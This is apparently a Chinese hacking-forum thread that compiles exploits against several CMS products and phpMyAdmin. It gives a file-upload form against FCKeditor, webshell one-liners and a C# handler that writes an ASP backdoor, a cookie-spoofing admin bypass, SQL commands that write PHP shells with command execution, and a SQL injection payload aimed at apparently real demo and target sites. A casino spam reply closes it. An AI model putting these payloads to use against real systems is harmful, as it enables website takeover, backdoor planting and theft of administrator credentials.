inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
& U& {3 a. r$ l$ s4 e# A0 }5 Z4 K
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- K7 A5 p" e8 T
8 y, z0 o5 ^' Q( ~# a0 N: x
YxShop易想购物商城4.7.1版本任意文件上传漏洞
/ ?% g* Y8 X4 w8 K4 ?
# a- H; ^/ ~. J% I9 {: I8 \' f* l
http://xxoo.com/controls/fckedit
... aspx/connector.aspx
p- Y6 n8 l; f) V9 a0 {7 v
跳转到网站根目录上传任意文件。
A- P+ C c4 q+ N( Z
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
& Q% W$ X6 _3 i" r
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
9 h; ~& P7 R& k3 X/ m" i5 p
Upload a new file:<br>
) r) g0 r( u& O& n# a% ^
<input type="file" name="NewFile" size="50"><br>
; z$ U |- K# w6 Q
<input id="btnUpload" type="submit" value="Upload">
4 r& T4 [ e9 }; P% l9 @% s
</form>
# N; h1 [6 {3 L8 _
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ `- A3 ]+ B: K: A
: V/ d2 A% ~6 q# P
SDcms 后台拿webshell
" D9 \ I l5 A' M/ a( j" i/ d/ ^
' c8 X1 b2 k( M3 j# e P3 j
第一种方法:
$ [4 M9 p& J p, _3 b
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
9 z2 @( X9 q+ n0 m' \/ g
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
: J* A' f8 _4 ^- g( [) y% t$ _
用菜刀链接
http://www.xxx.com/inc/const.asp
就搞定了。
, o9 }. [! j$ ~6 U9 o( i0 V7 F+ K& j7 H
第二种方法:
4 _- `$ j/ D; U+ y6 o
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
# N5 P, K# m$ ?4 I8 X
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
' M' e' ] a7 l9 T9 w
第三种方法:
4 ^0 P7 ]+ O! Z C! t
进入后台-->界面管理-->模板文件管理-->创建文件
' x5 x* d) ?" ~* i. A# y
文件名写入getshell.ashx
" z* D4 q4 V* ~- F! J9 P) T h
内容写入下面内容:
( Z4 O: G L0 b ]: H
/====================复制下面的=========================/
/ @( W \- x+ K6 A
<%@ WebHandler Language="C#" Class="Handler" %>
/ }9 X. I" y2 p) o
using System;
- P% N( Z. E9 x9 e; o5 u3 d
using System.Web;
* d8 Z7 e0 K5 m, ~8 F" [
using System.IO;
; U w; f. X7 e2 k: j
public class Handler : IHttpHandler {
9 m' t! s9 m6 ^9 u/ f7 I
public void ProcessRequest (HttpContext context) {
: X% B3 v+ W, f2 z; h2 \
context.Response.ContentType = "text/plain";
$ K( W. X. @* p, ~
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
% K( K/ s8 S- w+ ~: Q
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
6 B1 N' F) \ t6 [
file1.Flush();
! N: v& v! J0 ~0 a$ S5 t" j3 n
file1.Close();
8 \8 h% v8 ?! y# _
}
: v. n; E. s5 f8 s
public bool IsReusable {
- _( v+ j# C0 k6 u' J
get {
J: s6 v3 w7 [, S7 ]1 ]2 d
return false;
2 {5 r, w% y+ l, e9 h+ I
}
- V9 K# w2 s, ~/ c
}
; e# \/ R$ M- I! _1 X! d9 w2 c
}
7 t: M: C% E! N3 h, z! Q, u
/=============================================/
3 k; H0 F/ v: i, i' t, G4 R" P9 Y
访问这个地址:
http://www.xxx.com/skins/2009/getshell.ashx
6 |( ~- F3 C3 S5 o* ]
会在
http://www.xxx.com/skins/2009/
目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
# ^) d! }2 d3 `" O2 C3 r. b
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 v1 i4 @# j$ t5 q6 P# [
) }1 I2 p9 T6 H* {
ESCMS网站管理系统0day
$ ]2 y1 }6 `3 P
% @8 q0 j" U. b! n( [: p6 J
后台登陆验证是通过admin/check.asp实现的
+ q/ {. o, i" D! @- C/ z
9 C f3 D8 k$ J1 ~
首先我们打开
http://target.com/admin/es_index.html
1 X8 Q9 c3 N0 n& b( @+ D! J3 x
然后在COOKIE结尾加上
7 K9 M% v+ ]/ P4 F: d/ S# P
; ESCMS$_SP2=ES_admin=st0p;
: x6 L3 p2 k/ i( r8 @, T* z% V
修改,然后刷新
$ |6 c+ ^% n( Z& t! E0 {
进后台了嘎..
) D/ b# s- ]7 N& D9 ~, U8 U
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
. \ w/ J. t$ s1 S. Q
! d; L: d. {$ n) {7 f' B, g( Y- e
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
" } w* \2 |' u8 I% ?, q
嘿嘿,成功了,shell地址为
http://target.com/admin/diy.asp
4 I: t3 _) l: [; ~- A
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
+ g* [1 V$ L# Z N% j! M
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
+ L0 q x" Y8 a; K# o7 v x5 p
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( ]; w$ @' |! Z0 e5 c4 O7 d
( N6 }: S: p3 P+ n& H" d
宁志网站管理系统后台无验证漏洞及修复
' A: T5 f- d. _* n J5 ^9 H" S
/ @4 f( s1 `; e; U. q1 c
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
+ f2 h8 \2 M# f1 Y( v
官方网站:
www.ningzhi.net
$ o3 x& e* r. o6 N9 P- f% G+ L4 s7 W
学校网站管理系统 V.2011版本
; G3 i o! ?6 T1 U2 D' |* ]3 O
http://down.chinaz.com/soft/29943.htm
% K* W) Y2 G- J- l; B
其它版本(如:政府版等),自行下载.
" X' x. x# U" {2 Y1 d8 ^) I! S
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
8 M) G/ ?- `9 _
login.asp代码如下:
* l0 l6 ]" L/ P+ f/ K
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
8 s4 Z& H. D& P0 _& x9 b9 C- K# d0 J
manage.asp代码我就不帖出来了.反正也没验证.
$ p- {8 s, K2 [0 _; B# b
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
6 H8 q" c N( M8 V; Q' H
漏洞利用:
/ q: X7 }% { [- C) K- W; b/ j* A
直接访问
http://www.0855.tv/admin/manage.asp
2 ]! T: v5 ~( a9 V y/ i$ }
数据库操作:
http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
" d! ~! U: e7 k5 Z2 m0 q8 e
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! f: ]( w, w* u" U' p1 x
" O! n/ {" [" c D: u& }3 a6 q
phpmyadmin拿shell的四种方法总结及修复
( Q8 t, {, U7 _. @3 j/ g" M
: L8 s( Y: f% h) v! N/ h
方法一:
3 K8 L/ P# P- H: y+ q' g* T" u
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
5 k% R1 F+ b+ v" Q5 E
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
( q3 U% F Z% W' i8 g* J6 L
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
- G- F- d4 h/ I% g6 m
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
6 @1 `4 H9 z5 L6 j/ b
一句话连接密码:7on
! X3 x& H5 g! ^# J& v
方法二:
( B7 y- |7 Z' b5 {5 y7 V8 r
读取文件内容: select load_file('E:/xamp/www/s.php');
7 n; K% x3 K/ A( O# S* A3 h
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
/ p1 z7 s# O5 o
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
* Z I9 E; M+ Y o9 X6 d
方法三:
# F- ?; U n$ @' {0 l$ E8 P
JhackJ版本 PHPmyadmin拿shell
( a" { F& Z. a0 K+ O
Create TABLE study (cmd text NOT NULL);
) [; A* _' ]4 z4 C1 W }0 h* w
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
# j! J% g% ]9 R& n+ s
select cmd from study into outfile 'E:/wamp/www/7.php';
& w& z- f% i: X' }' Z
Drop TABLE IF EXISTS study;
: B- r# D% y! H
<?php eval($_POST[cmd])?>
3 F; _( r, Q* e# E$ r
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
) t% @) q) k/ ^3 b0 o0 u( S
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
( D; A2 T, v' e2 k
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
: V- I( X: m/ `5 F
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
8 g8 j9 T7 v0 e! { g5 X
方法四:
1 |; K) l0 s: j7 @; g F
select load_file('E:/xamp/www/study.php');
9 z" S7 A% T* o0 |, _3 j
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
0 u8 b, Y& A8 g2 e0 ]4 m
然后访问网站目录:
http://www.2cto.com/study.php?cmd=dir
7 ~% T/ h' e4 \8 A8 G1 H/ P8 D7 s
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
- ~2 L' c, k+ b# R
; J5 v9 o* h$ w! I: _
NO.001中学网站管理系统 Build 110628 注入漏洞
5 W: q2 G/ J/ T1 a2 ~* S; O6 H
$ ~5 V% [ @7 q8 f, T/ O3 J2 p
NO.001中学网站管理系统功能模块:
) k" ?) D$ I7 q# N: B0 ]% ?( z
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
! M1 Y" \ D1 }2 V
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
, U' P. `( Z, ^$ J
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
5 u" L2 ?1 l. T- W% T
4.视频图片管理:一级分类,动态添加视频或者图片等信息
% I, f& C4 N. s& c3 ^& }4 R
5.留言管理:对留言,修改,删除、回复等管理
7 Z- y6 i. _4 G6 R; L: H6 m
6.校友频道:包括校友资料excel导出、管理等功能
4 B2 g, p. c' O' M# S9 O3 T
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
/ v+ M( E8 r v z' P0 s
默认后台:admin/login.asp
( {7 a% ?/ V1 E! O- t% V
官方演示:
http://demo.001cms.net
; F1 p# v% O. }& G! S/ b M3 t6 t
源码下载地址:
http://down.chinaz.com/soft/30187.htm
4 R1 m$ \" l9 a2 @8 F& X" Q
EXP:
- `% D, w* Q# `0 B
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
& H: e4 h: b$ h& v! I0 \& E% X- x* h* Q) O6 e
测试:
http://demo.001cms.net/shownews.asp?type=
新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
, P# N# |! a, S3 z) D3 w
getshell:后台有备份,你懂的
0 R+ P4 |& c: D. c( |$ Q
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
* p7 }! Y0 o+ ~0 A0 B- h! o$ ^
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
作者:
匿名
时间:
2017-10-28 08:21
casino slots
online casino canada
new online casino
slot machines
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2